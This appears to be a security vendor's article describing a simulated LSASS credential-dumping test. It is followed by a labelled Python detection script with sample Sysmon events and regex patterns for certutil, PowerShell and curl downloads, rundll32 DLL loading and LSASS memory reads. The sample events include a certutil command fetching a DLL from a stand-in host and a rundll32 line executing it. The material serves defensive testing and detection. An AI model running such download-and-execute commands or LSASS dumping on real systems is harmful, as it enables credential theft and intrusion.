John Lundgren

Attack on Demand: Credential Access using LSASS

Updated: May 24

This article provides a demonstration and context for the Credential Access using LSASS Attack on Demand packages that are a part of the Continuous Intelligent Red Team (CIRT) Insider Threat module.


Background


When an attacker first gains access to a host, one of their early goals is to seize as many credentials as possible. This increases the likelihood that they will have the permissions needed to maneuver through the compromised network and achieve their objective - usually stealing or encrypting your valuable data.


On a Microsoft Windows host, one of the most common tactics an attacker uses to seize credentials is to dump the process memory of the Local Security Authority Subsystem Service (LSASS). LSASS enforces the local security policy and holds in memory the credential material for every logged-on user: NTLM password hashes, Kerberos tickets and, depending on configuration, plaintext passwords. With a copy of LSASS memory (typically a minidump file), the attacker can use a tool like Mimikatz, on the host or offline, to extract credentials that let them advance their attack.


Scenario


An attacker has gained initial Administrator access to the host you're testing, and now needs to collect credentials that will allow them to maneuver to additional hosts or shared resources in your network, in order to gain access to the data they are seeking to steal or ransom.


Technical Requirements

  • Microsoft Windows 10 Host

  • Administrator Privileges


Attack Package Descriptions


Currently, there are two options available to test your security against this tactic: Credential Access using LSASS, and Credential Access using LSASS and Mimikatz. The steps taken to gain execution and dump LSASS memory are identical in both. In the option with Mimikatz, the test additionally attempts to extract credentials from the dumped LSASS memory on the host being targeted.


Advanced attackers are more likely to exfiltrate the dumped LSASS memory and run Mimikatz or a similar tool offline, because Mimikatz is well known and commonly detected by security solutions, so running it on the compromised host increases the chance that the attack will be disrupted.


Attack Package Steps


Once the execution script is run as Administrator, the following actions will occur:

  1. Internet connectivity will be tested by attempting to ping www.breachbits.com.

  2. The BreachBits BlueShadow loader will be downloaded from the BreachBits attack infrastructure using one of the following native Windows utilities:

    • curl (only available in recent Windows 10 releases)

    • PowerShell

    • certutil

  3. The Windows utility rundll32.exe will be used to load the BlueShadow Dynamic Link Library (DLL) into memory. Read more about this common execution and defense evasion tactic here: https://attack.mitre.org/techniques/T1218/011/

  4. BlueShadow will download the payload needed to dump LSASS memory (and Mimikatz, for the option with Mimikatz).

  5. BlueShadow will attempt to dump the LSASS memory and write it to a file on the Desktop. This file stays on the host being tested.

  6. (Mimikatz Package Only) BlueShadow will use Mimikatz to extract credentials and hashes from the LSASS memory file. The Mimikatz output also stays on the host being tested.


Results and Next Steps


The best (and most secure) result of tests using these Attack on Demand packages is your security solution stopping BlueShadow from dumping LSASS memory at all. Dumping the memory of a process is not malicious by itself, but a process opening LSASS with read access and copying out a large volume of its memory should be enough for your endpoint security solution to detect (and ideally block) the behavior, keeping your credentials safe from attackers who use this tactic to expand their access and move laterally through your network.
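The following is an added example, not BreachBits code and not part of the original article: a small detection pass in Python over constructed Sysmon-style events that covers the download, rundll32 and LSASS-access steps listed above and the "sensitive process being read" signal this section relies on. Field names follow Sysmon's ProcessCreate (Event ID 1), ProcessAccess (Event ID 10) and FileCreate (Event ID 11) conventions; the sample events, paths, download URL and allowlist are invented for illustration.

```python
"""Toy detection pass for the LSASS credential-access chain.

Constructed Sysmon-style events (ProcessCreate = ID 1, ProcessAccess = ID 10,
FileCreate = ID 11) stand in for real telemetry.  Paths, the download URL and
the allowlist are invented for this example; nothing here is BreachBits code.
"""
import re
from dataclasses import dataclass

# Any tool that minidumps LSASS needs a handle with PROCESS_VM_READ (0x10);
# the access mask is the cheapest signal a Sysmon-level rule can key on.
PROCESS_VM_READ = 0x0010

# Processes that legitimately open LSASS on a healthy host.  Assumed baseline:
# a production allowlist is tuned per environment and pinned to signed binaries.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\svchost.exe",
}

# User-writable locations an attacker-supplied DLL or dump file would live in.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(desktop|downloads|appdata)|temp|programdata)\\", re.I)

# Native download utilities named in the attack package, with command-line
# fragments that indicate a fetch from the network (T1105).
DOWNLOAD_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-verifyctl", re.I),
    "curl.exe": re.compile(r"https?://", re.I),
    "powershell.exe": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer",
        re.I),
}


@dataclass
class Alert:
    technique: str
    event: dict


def image_name(path):
    """Return the lower-cased file name of an Image/TargetImage path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process_create(event):
    image = image_name(event["Image"])
    cmdline = event.get("CommandLine", "")
    pattern = DOWNLOAD_PATTERNS.get(image)
    if pattern and pattern.search(cmdline):
        return Alert("T1105 ingress tool transfer via " + image, event)
    # rundll32 itself is normal; rundll32 loading a DLL from a user-writable path is not.
    if image == "rundll32.exe" and USER_WRITABLE.search(cmdline):
        return Alert("T1218.011 rundll32 loading DLL from user-writable path", event)
    return None


def check_process_access(event):
    if image_name(event["TargetImage"]) != "lsass.exe":
        return None
    granted = int(event["GrantedAccess"], 16)
    if not granted & PROCESS_VM_READ:
        return None  # a handle without VM_READ cannot copy the memory out
    if event["SourceImage"].lower() in LSASS_ACCESS_ALLOWLIST:
        return None
    return Alert("T1003.001 LSASS memory read (GrantedAccess 0x%x)" % granted, event)


def check_file_create(event):
    name = event["TargetFilename"].lower()
    if name.endswith(".dmp") and ("lsass" in name or USER_WRITABLE.search(name)):
        return Alert("T1003.001 minidump written to " + event["TargetFilename"], event)
    return None


CHECKS = {1: check_process_create, 10: check_process_access, 11: check_file_create}


def detect(events):
    """Run every event through the check registered for its Sysmon event ID."""
    alerts = []
    for event in events:
        check = CHECKS.get(event["EventID"])
        alert = check(event) if check else None
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry mirroring the attack package steps.  The
# connectivity ping (step 1) deliberately produces no alert: it is a test
# artifact, not a technique worth a rule.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping www.breachbits.com"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f https://example.invalid/loader.dll "
                    r"C:\Users\alice\Desktop\loader.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\Desktop\loader.dll,Start"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\wininit.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 11, "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetFilename": r"C:\Users\alice\Desktop\lsass.dmp"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert.technique)
```

Run stand-alone, the pass raises four alerts for the six events: the certutil download, rundll32 loading a DLL from the Desktop, rundll32 opening LSASS with a mask containing VM_READ, and the lsass.dmp file landing on the Desktop; wininit's full-access handle to LSASS is allowlisted and the ping is ignored. A commercial endpoint product works at a different layer (it can block the handle or the MiniDumpWriteDump call rather than just log it), so treat rules like these as a way to confirm visibility of the test, not as a substitute for the product-level block the paragraph above describes. The ProcessAccess rule in particular needs per-environment tuning, since backup agents and some security tools legitimately open LSASS with VM_READ.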


If your endpoint security solution allowed the dumping of LSASS memory, we recommend reviewing its documentation to identify configuration changes that increase the sensitivity of the solution, so that an attacker cannot use this tactic to reach your sensitive credentials. Windows also ships its own controls against this technique, LSA Protection (RunAsPPL) and Credential Guard, which are worth enabling alongside the endpoint solution rather than relying on detection alone.





